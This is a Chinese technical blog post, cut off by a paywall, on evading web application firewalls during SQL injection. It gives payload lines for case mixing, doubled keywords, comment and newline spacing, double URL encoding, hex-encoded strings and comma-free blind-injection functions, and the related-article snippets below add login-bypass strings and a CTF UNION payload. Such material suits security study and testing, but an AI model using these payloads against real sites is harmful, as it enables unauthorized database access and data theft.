SQL注入&WAF绕过姿势

最新推荐文章于 2024-06-05 14:13:37 发布
最新推荐文章于 2024-06-05 14:13:37 发布
阅读量2.1w 收藏 79
点赞数 7
分类专栏: WEB漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31481187/article/details/59727015
版权

1.WAF过滤机制:

1.异常检测协议–拒绝不符合HTTP标准的请求;
2.增强的输入验证–代理和服务端的验证而不只是限于客户端验证;
3.白名单&黑名单机制–白名单适用于稳定的Web应用,黑名单适合处理已知问题;
4.基于规则和基于异常的保护–基于规则更多的依赖黑名单机制基于,基于异常根据系统异常更为灵活;
5.另外还有会话保护、Cookies保护、抗入侵规避技术、响应监视和信息泄露保护等。

2.WAF绕过姿势

(1)大小写绕过

此类绕过不经常使用,但是用的时候也不能忘了它,他原理是基于SQL语句不分大小写的,但过滤只过滤其中一种。
这里有道题

(2)替换关键字

这种情况下大小写转化无法绕过而且正则表达式会替换或删除select、union这些关键字如果只匹配一次就很容易绕过

http://www.xx.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4

(3)空格绕过

payload

select/**/*/**/from/**/yz;
select%0a*%0afrom%0ayz; %0a 是回车
/*!select*//*!**//*!from*//*!yz*/;

select(a)from(yz);
select(a)from(yz)where(a=1);

## (4)替换关键字
这种情况下大小写转化无法绕过而且正则表达式会替换或删除select、union这些关键字如果只匹配一次就很容易绕过

SELselectECT 1,2,3,4

(5)URL编码

有时后台界面会再次URL解码所以这时可以利用二次编码解决问题
后台语句

$insert=$link->query(urldecode($_GET['id']));
$row=$insert->fetch_row();
select * from yz
select * from  %2579%257a

(6)十六进制绕过(引号绕过)

在SQL语句的数据区域可以采用十六进制绕过敏感词汇

select a from yz where b=0x32;
select * from yz where b=char(0x32);
select * from yz where b=char(0x67)+char(0x75)+char(0x65)+char(0x73)+char(0x74)



select column_name  from information_schema.tables where table_name="users"
select column_name  from information_schema.tables where table_name=0x7573657273

(7)逗号绕过

在使用盲注的时候,需要使用到substr(),mid(),limit。这些子句方法都需要使用到逗号。对于substr()和mid()这两个方法可以使用from to的方式来解决。
substr(),mid()

mid(user() from 1 for 1)
substr(user() from 1 for 1)
select substr(user()from -1) from yz ;
最低0.47元/天 解锁文章
4ct10n
关注
  • 7
    点赞
  • 79
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
mysql注入的 反斜杠,SQL注入防御绕过——二次编码之干掉反斜杠
weixin_28895433的博客
03-18 606
01 背景知识一、为什么要进行URL编码通常如果一样东西需要编码,说明这样东西并不适合传输。对于URL来说,编码主要是为了避免引发歧义与混乱。例如,URL参数字符串中使用key=value键值对这样的形式来传参,键值对之间以&符号分隔,如/?name=abc&pwd=123如果你的value字符串中包含了=或者&,那么势必会造成接收Url的服务器解析错误,因此必须将引起歧义...
mysql 16进制 绕过_注入绕过技巧
weixin_39846361的博客
01-20 2796
1.绕过空格(注释符/* */,%a0):两个空格代替一个空格,用Tab代替空格,%a0=空格:%20%09%0a %0b %0c %0d %a0/**/最基本的绕过方法,用注释替换空格:/*注释*/2.括号绕过空格:如果空格被过滤,括号没有被过滤,可以用括号绕过。在MySQL中,括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来。而括号的两端,可以没有多余的空格。例如:...
深入了解SQL注入绕过waf过滤机制
05-04
知己知彼百战不殆 --孙子兵法 [目录] 0x00 前言 0x01 WAF的常见特征 0x02 绕过WAF的方法 0x03 SQLi Filter的实现及Evasion 0x04 延伸及测试向量示例 0x05 本文小结 0x06 参考资料
聊一聊SQL注入常用绕WAF小技巧
Javachichi的博客
02-08 1814
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。(都打包成一块的了,不能一一展开,总共300多集)
sql注入详解
Cairo_A的博客
06-05 865
SQL注入是由于程序没有对用户输入数据的合法性进行验证和过滤,导致SQL查询语句被恶意拼接从 而产生SQL注入
mysql 16进制 绕过_sql注入绕过
weixin_39783633的博客
02-01 853
1.空格过滤绕过可用/**/制表符(url编码为%09)换行符(%0a)括号反引号 代替空格mysql数据库有一个特性。在条件语句中,在 where id =1 后面加上 “=1”,成为where id =1 =1 ,就是对前面所有结果&1,查询的结果与原来一样。where id =1 =0 就是对于前面所有结果&0 ,查询的结果为除去原有查询结果的其他数据,输出的是除去1以外的...
CTF学习笔记13:iwebsec-SQL注入漏洞-11-十六进制绕过
lifeng_dc的博客
01-23 1484
一、本题难道名不符实,用第1题数字型payload直接打出结果 二、原来是payload中没有单引号,实际做题过程要一步步分析,那么来看看取列名这一步会怎样 (一)果然报错: (二)原因如下: (三)用users的十六制代替 ?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 ...
iwebsec靶场 SQL注入漏洞通关笔记11-16进制编码绕过
mooyuan的博客
12-01 2439
打开靶场,url为id=1如下所示SQL注入主要分析几个内容(1)闭合方式是什么?iwebsec的第11关关卡为数字型,无闭合(2)注入类别是什么?这部分是普通的报错型注入(3)是否过滤了关键字?很明显通过源码,iwebsec的11关增加了addslashes和get_magic_quotes_gpc函数,可以使用16进制编码的方式进行绕过
【红日Day13-CTF】特殊WAF SQL注入绕过
PZ的博客
01-20 992
练习记录 复现代码: index.php <?php require 'config.php'; function dhtmlspecialchars($string) { if (is_array($string)) { foreach ($string as $key => $val) { $string[$key] ...
ctf wav文件头损坏_WAF绕过第三阶段:文件上传
weixin_39717598的博客
11-25 282
“旨在研究WAF对抗”01—Bypass Upload测试环境:SafedogV4.0+phpstudy+uploadlabs测试条件:upload存在MIME验证绕过,如图代码:(仅验证类型)开始测试拦截规则:其中上传参数说明解释:301793114315180:Content-disposition头提供给浏览器确定HTTP响应内容的信息。当浏览器读到这些头信息后,它能确定:# H...
SQL注入绕过技巧
misiwole的博客
01-21 8566
转载自:https://blog.csdn.net/weixin_44940180/article/details/107717511 基本绕过方法 1.大小写 2.双写 3.编码,如URLEncode编码,ASCII编码绕过 4.内敛注释 空格绕过 1.用注释替换空格 select//user,password//from /**/users; 2.空格url编码%20 3.两个空格代替一个空格 4.用Tab代替空格 5.%a0=空格 6.如果空格被过滤,括号没有被过滤,可以用括号绕过 select(u
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
SQL注入原理及绕过技术
热门推荐
星落的博客
05-29 1万+
sql注入产生的原因 程序开发过程中,由于不重视书写规范,对sql关键字未进行过滤,导致客户端可以通过POST或GET提交sql语句到服务器端正常运行 万能密码介绍 select * from tables where username = ' ' and password = ' ' ' and '1' ='1 ' or '1' = '1 sql注入验证 单引号 ' and 1 = 1 and 1 = 2 如果页面中mysql报错,证明该页面存在sql 注入漏洞 mysql 5....
Web安全之SQL注入绕过技巧
m0_74131821的博客
04-11 1675
今天跟大家聊聊SQL注入的几种绕过技巧
掌控安全靶场第二章:遇到阻难!绕过WAF过滤
k1k5cn的博客
11-10 2497
最近在学习CTF,前不久发现一个还不错的靶场 封神台 - 掌控安全在线演练靶场 二话不说,开干吧 第二章:遇到阻难!绕过WAF过滤! 一、测试是否有注入点 附上链接 https://hack.zkaq.cn/battle/target?id=31ac789a52edf9bb 标题上写了是【配套课时:SQL注入攻击原理 实战演练】SQL注入, 随便点击一个新闻。在id=171后面加一个引号’,测试一下是否有SQL注入。 有弹框了,提示过滤了很多关键字。下一步考虑如何绕过这些关键字。 二、绕过WAF关键字过滤
php string ctf,PHP字符解析特性绕WAF【buuctf题 easy calc】
weixin_39939601的博客
03-11 297
一、PHP字符串解析特性PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会:1.删除空白符2.将某些字符转换为下划线(包括空格)例如,/?%20news[id%00=42会转换为Array([news_id] => 42),然后参数%20news[id%00的值将存储到$_GET["news_id"]中。(URL编码%20是空格,%00是0)例如:User inputDec...
命令执行中多种文本查看绕过waf命令合集
Thunderclap的博客
02-25 578
当渗透测试或者打CTF时,目标环境中存在waf或者一些过滤不允许执行一些查看文本命令,可以通过如下其他的未过滤命令进行利用
Waf功能、分类与绕过
javagty6778的博客
02-17 333
WAF是Web应用防火墙(Web Application Firewall)的简称,对来自Web应用程序客户端的各类请求进行内容检测和验证,确保其安全性与合法性,对非法的请求予以实时阻断,为Web应用提供防护,也称作应用防火墙,是网络安全纵深防御体系里重要的一环。WAF属于检测型及纠正型防御控制措施。WAF分为硬件WAF、软件WAF(ModSecurity)和云WAFWAF对请求的内容进行规则匹配、行为分析等识别出恶意行为,并执行相关动作,这些动作包括阻断、记录、告警等。
sql注入常见绕过
weixin_46079186的博客
06-26 1558
目录: 1. 大小写绕过 2. 双写绕过 3. 内联注释绕过 4. 编码绕过 5. <>绕过 6. 注释符绕过 7. 对空格的绕过 8. 对or/and的绕过 9. 对等号=的绕过 10. 对单引号的绕过 11. 对逗号的绕过 12. 过滤函数绕过 13. 过滤–和#时 14. 过滤order by 15. 过滤关键字为空 0x01 大小写绕过 UniOn SeleCt 0x02 双写绕过 ununionion seselectlect 0x03 内联注释绕过 内联注释就是把一些特有的仅在MYS
sql注入及其waf绕过
最新发布
06-07
SQL注入是指攻击者通过在Web应用程序的输入参数中插入恶意SQL语句,以执行未经授权的操作。攻击者可以利用SQL注入漏洞来窃取敏感数据,修改数据库中的数据或者执行其他恶意行为。为了防止SQL注入攻击,Web应用程序通常会使用一些安全措施,例如WAF(Web应用程序防火墙)。 WAF是一个位于Web应用程序和互联网之间的设备或软件,用于监视和过滤Web应用程序的输入和输出流量,以保护Web应用程序免受各种攻击。WAF通常使用正则表达式等技术来检测恶意输入,并拦截可疑请求。然而,攻击者可以使用一些技术来绕过WAF,例如使用编码、分段、多个请求等方式来绕过WAF的检测。 为了防止SQL注入攻击和WAF绕过,开发人员应该采取以下措施: 1. 使用参数化查询或预处理语句来防止SQL注入攻击。 2. 对输入进行过滤和验证,以防止恶意输入。 3. 对敏感数据进行加密和哈希处理。 4. 使用最新版本的WAF,并配置正确的规则集。 5. 定期对Web应用程序进行安全审计和漏洞扫描。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值